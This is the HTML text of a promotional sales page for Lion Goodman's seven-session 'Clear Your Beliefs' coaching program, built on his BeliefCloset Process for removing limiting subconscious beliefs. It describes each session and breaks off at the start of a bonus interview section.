O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused 